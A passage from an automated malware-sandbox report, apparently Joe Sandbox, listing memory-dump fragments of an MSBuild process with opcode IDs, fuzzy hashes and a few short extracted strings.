                                      • Opcode Fuzzy Hash: 18ee4ba834c6c69551b20a1695fc6981b8644215788b32c0ff1a274bb9357332
                                      • Instruction Fuzzy Hash: 23215E30B00245DFDB54EB74D5147AD77F2AB89341F210469D60AEB364DB32CD41CBA9
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e5fd0b65295f7c856b1c03332be2938a32ea4d6adb3e85c1581327db1fa05547
                                      • Instruction ID: f06acbce38fba8e32bab11eb220cb9dba47e17b41e547cf3a8724346158ca05b
                                      • Opcode Fuzzy Hash: e5fd0b65295f7c856b1c03332be2938a32ea4d6adb3e85c1581327db1fa05547
                                      • Instruction Fuzzy Hash: 50218030E102159BDB18CFA4D450ADEF7B2FF89310F21862AE915BB384DB71AD45CB54
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8042e03a338633a45acd418754533e1c5ce5a028422a21045cba50784bfed33a
                                      • Instruction ID: 8494e1ca5069845e9342433d610c0ca9655a931b255cc038a77ed6accac04f84
                                      • Opcode Fuzzy Hash: 8042e03a338633a45acd418754533e1c5ce5a028422a21045cba50784bfed33a
                                      • Instruction Fuzzy Hash: 9721D538A10205CFDF65EB28F8A475A3B5AEB45715F224926E10ECB35DDB30EC45CB86
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f4db1d6e34af43506574fc0a48fcb82810d94251e2412774d90a535994588dcf
                                      • Instruction ID: c7df609addda89d224c936378ed71501653469e7a8fd3f8850bcc687abaaa769
                                      • Opcode Fuzzy Hash: f4db1d6e34af43506574fc0a48fcb82810d94251e2412774d90a535994588dcf
                                      • Instruction Fuzzy Hash: 80210734A00205DFDB54EB78D558B9E77F1EB49305F214468E606EB3A4DB319D00CBA5
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508271077.0000000002CFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CFD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2cfd000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b1236ade67ec6d1b182c8abc5553380601049f1220419e4466631b1f2ad74424
                                      • Instruction ID: 16af70d228321722dd5be4fe8aac0a6aba88a1c75372d69b3ebfc5990ccf3006
                                      • Opcode Fuzzy Hash: b1236ade67ec6d1b182c8abc5553380601049f1220419e4466631b1f2ad74424
                                      • Instruction Fuzzy Hash: 39215C755093C09FC747CB24C990715BF71AB86214F28C5DBD9898B6A3C33A980ACB62
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 525f758d5cc93705e0ebac54d66aa5b1dac641ea885d0d80d778d7f604f590b2
                                      • Instruction ID: c24b93afea9dc3821e5adb641b0cf593bcbe2e7724d81a5d6769c42d60a041f4
                                      • Opcode Fuzzy Hash: 525f758d5cc93705e0ebac54d66aa5b1dac641ea885d0d80d778d7f604f590b2
                                      • Instruction Fuzzy Hash: 4C11B270A00215CBEFB96625E18836D3B96E786715F12082AE60EC7780DB75DC85C74B
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7d226a22f12fe6e6580dcf8c28714dc91125151087a65d763aabac07c2049cfb
                                      • Instruction ID: 93f04bb2ee40ac541bf1d2748ea6327cd9ab6256a429ab0c5b8ec93825093f49
                                      • Opcode Fuzzy Hash: 7d226a22f12fe6e6580dcf8c28714dc91125151087a65d763aabac07c2049cfb
                                      • Instruction Fuzzy Hash: D711E375B00205AFCF04AB79985879E7FA5FB88250F210439EA4ED3308EB31CC02C795
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a27ef5e0f712d1e2ac906f74a415bff25518b5474ea95be753294c26e1ce1c90
                                      • Instruction ID: 73b90a44490bc67a23629178069493b1554d63f0faa60630faaee407046e27b5
                                      • Opcode Fuzzy Hash: a27ef5e0f712d1e2ac906f74a415bff25518b5474ea95be753294c26e1ce1c90
                                      • Instruction Fuzzy Hash: 49112334B002098BEFA4BA79D8147293356EB84616F12493AD602CF34EEB21DC41CBD5
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 15d7543508d66ab188adf376666723c646865e7d2185e8e5dfe30d694c50e5e3
                                      • Instruction ID: 06e2e72130942db368b8d35127657f1f92e299af9bb0590116e23afc793f9a81
                                      • Opcode Fuzzy Hash: 15d7543508d66ab188adf376666723c646865e7d2185e8e5dfe30d694c50e5e3
                                      • Instruction Fuzzy Hash: 9311E335F002459BFFA4BA79E8143693751DB8462AF16442BD646CF34EEA21CC49CBCA
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 336692d5690a4a033d51259a110e2f1a71dd157bac0109aa567d9238fbd757eb
                                      • Instruction ID: 3ccfe5f3317d39eff5295cdc889f3569d6b4d5a913b658951300614e4a61b3ec
                                      • Opcode Fuzzy Hash: 336692d5690a4a033d51259a110e2f1a71dd157bac0109aa567d9238fbd757eb
                                      • Instruction Fuzzy Hash: 67115E72E01215CBCFA1EFB884902AD77F5EF88211B26047AC90AE7341E735DD41CBA5
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 20788f4302924ffdb11420689e1c82568956386dcdceb230ca05324d6737b92c
                                      • Instruction ID: 4a7d2c6bdbbd0b451acdf1aa765a07338d44439b26edd853c22eeb0a9911b0f3
                                      • Opcode Fuzzy Hash: 20788f4302924ffdb11420689e1c82568956386dcdceb230ca05324d6737b92c
                                      • Instruction Fuzzy Hash: 9A110834B002459BEFA47A78E4543793712D785616F12493BDA46CF34EEB21CC45CBD5
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 37b27e747cb86d1f0cbb0f742ac8a099274c5e0f0b2b4835e9e544c46952ba34
                                      • Instruction ID: 9477f67dbd03d0e221d39316d9632bc3c7efe7e14fcca0c7b6c7af444cfa277d
                                      • Opcode Fuzzy Hash: 37b27e747cb86d1f0cbb0f742ac8a099274c5e0f0b2b4835e9e544c46952ba34
                                      • Instruction Fuzzy Hash: 3301C075B00255AFCB14ABB9A80879E7FE6FB88250F110439EA0AD3308EB35CC01C7D5
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5f60501d8bd6d668944674b9aa1b0150a98296cf0fc59be7993c3a01405d3c3f
                                      • Instruction ID: 7218f9d43f14cf178712df7fad65f5526d38be2611eb5f4d61a18d7320c9fc2c
                                      • Opcode Fuzzy Hash: 5f60501d8bd6d668944674b9aa1b0150a98296cf0fc59be7993c3a01405d3c3f
                                      • Instruction Fuzzy Hash: 43016D31A01255CBCF61EFB884502AD7BF9EF88211B16047AD909E7341E735DC41CBA9
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b519c006fd3749ed3bf8a3820fc8f8a761fb814f4e8ce47b255d3924117d1493
                                      • Instruction ID: d21fa54c90e338f85081e5904260024cb11484fda93ee1997ec232d6d1d62709
                                      • Opcode Fuzzy Hash: b519c006fd3749ed3bf8a3820fc8f8a761fb814f4e8ce47b255d3924117d1493
                                      • Instruction Fuzzy Hash: 6A018431A002048BDB10DF65DD84B8ABB66EF84311F598168D94C5F39ADB70ED45CB91
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0e50bbbab3874870d8416780bd79d33f0c40d1a596dffaa8a59bc3220f1a18a7
                                      • Instruction ID: f3bc7247c1fd6dd499741fbe361f01f36f9c6634b2cf4a0c16a685bb472e6a00
                                      • Opcode Fuzzy Hash: 0e50bbbab3874870d8416780bd79d33f0c40d1a596dffaa8a59bc3220f1a18a7
                                      • Instruction Fuzzy Hash: A9110970D0424CDACFB4DA94D9987EDBB72AF2131AF16642AC210B2294DB704CC9CF19
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 57e2af75f0fb53cb1dcf4e65df20d57c0600fd85bacf83ff5dbb340bd7937f30
                                      • Instruction ID: d76a6eee6008f3324b25d005f3f23987996b73cc341ffa20a2f2231ab35ee3cf
                                      • Opcode Fuzzy Hash: 57e2af75f0fb53cb1dcf4e65df20d57c0600fd85bacf83ff5dbb340bd7937f30
                                      • Instruction Fuzzy Hash: 7601623491020DAFDB41FBA4F950B9DBBB1EF40304F1051B9C1059B24DEA317E099B92
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6f683e87c818213b76317e9915a685cf02de2003947547f5eff541270f741124
                                      • Instruction ID: e92c85f0f84cebec5353f11778a883b8fcc0c8c32a64c671a60b36fe82a77ea3
                                      • Opcode Fuzzy Hash: 6f683e87c818213b76317e9915a685cf02de2003947547f5eff541270f741124
                                      • Instruction Fuzzy Hash: 34F0C435B402088FCB08DB68D5A8BAC7BB2EF88315F5544A8E5069B3A4CF31AD42CB40
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 333047f687d75000dcf99beed1820d3250adfd6910fa5a292234b8c52f490a9f
                                      • Instruction ID: e805f8c0b447dcd7de4c49c0115cc75a2091a09c7c52c17f5bcccbc8428d1747
                                      • Opcode Fuzzy Hash: 333047f687d75000dcf99beed1820d3250adfd6910fa5a292234b8c52f490a9f
                                      • Instruction Fuzzy Hash: 11F0313491021D9FDB41FFA4F950AADBBB1AB40301F1086B9C1059B25DEA317E099B92
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2512012896.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_6950000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $q$$q$$q$$q$$q$$q$$q$$q$$q$$q
                                      • API String ID: 0-1298971921
                                      • Opcode ID: 0a26cf6ddba4bd4dd7ee42246477862a82ce5ce309501e22b1ef44e86f0e075e
                                      • Instruction ID: 2f4cdc084d6a49f2c836da32e191fece93d4ff1d7629787a9b10de191390b159
                                      • Opcode Fuzzy Hash: 0a26cf6ddba4bd4dd7ee42246477862a82ce5ce309501e22b1ef44e86f0e075e
                                      • Instruction Fuzzy Hash: 5A122A30E00219CFDB64DB65D854B9EB7B2FF88301F268569D90AAB755DB30AD81CF90
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2512012896.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_6950000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 0oht$Dqht$PHq
                                      • API String ID: 0-215525555
                                      • Opcode ID: bed22e63e2e3d34e1a956b9585f7f2d21b139fea0cf7636ada1e9015fd087d37
                                      • Instruction ID: 6d7e9af77e32488867af2692db1b9bef7b8ac56bd93764a90bde3f4d054cc91a
                                      • Opcode Fuzzy Hash: bed22e63e2e3d34e1a956b9585f7f2d21b139fea0cf7636ada1e9015fd087d37
                                      • Instruction Fuzzy Hash: 6222AF30B10205CFDB64DB68D894B6EBBE6EF88310F268469D806DB765DB31EC45CB91
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2512012896.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_6950000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: XPq$\Oq
                                      • API String ID: 0-3725437444
                                      • Opcode ID: 043fdb0c49af28ff8970231d629835d1b455d38abbe14e5b6c324e60096c589a
                                      • Instruction ID: 51db778322ad448eebf0850a814fa9f7be046f82659c97ecc8314d9165c3ed7b
                                      • Opcode Fuzzy Hash: 043fdb0c49af28ff8970231d629835d1b455d38abbe14e5b6c324e60096c589a
                                      • Instruction Fuzzy Hash: 6AE11731B101148FDF64DB69D880AAEBBF6FF89750F26846AE806DB751DA31DC41CB90
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1a766975de0afb6d2b1c756cfde2e93332393d9db678397a703bae421db7b8f8
                                      • Instruction ID: aa0cfd474754b1260363f555b65e7ebd22140251c1c0a158d7ef99f6ae78d812
                                      • Opcode Fuzzy Hash: 1a766975de0afb6d2b1c756cfde2e93332393d9db678397a703bae421db7b8f8
                                      • Instruction Fuzzy Hash: FF23FB31D10B198EDB11EF68C8806ADF7B1FF99300F15D79AE458A7261EB70AAC5CB41
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: \VVm
                                      • API String ID: 0-390912563
                                      • Opcode ID: 17aca77af98fea1fec812050829537b7f71d6a30dba6983e779ba070467a651a
                                      • Instruction ID: 0b1ef78f58870b1ed611dad28e4f64f7cab9c22cfdb37e74a15d4ac8d172ee52
                                      • Opcode Fuzzy Hash: 17aca77af98fea1fec812050829537b7f71d6a30dba6983e779ba070467a651a
                                      • Instruction Fuzzy Hash: C5B15C70E002098FDB64CFA9D8857AEBBF2AF88314F158129DA55A7394EB749C41CF85
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2512517230.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_6aa0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bb24a5bdae042841f5b44476ce5aacaaf6674fff46ef79d04da809dd91bb1a47
                                      • Instruction ID: 0cbbc4375dfda8aa2814d0bf155e294c4eb131b29db489411e735ea82906f2ee
                                      • Opcode Fuzzy Hash: bb24a5bdae042841f5b44476ce5aacaaf6674fff46ef79d04da809dd91bb1a47
                                      • Instruction Fuzzy Hash: 0BA17E32E003098FCF55EFA5C84059EB7F2FF85300B1545AAE915AF221DB35E956CB90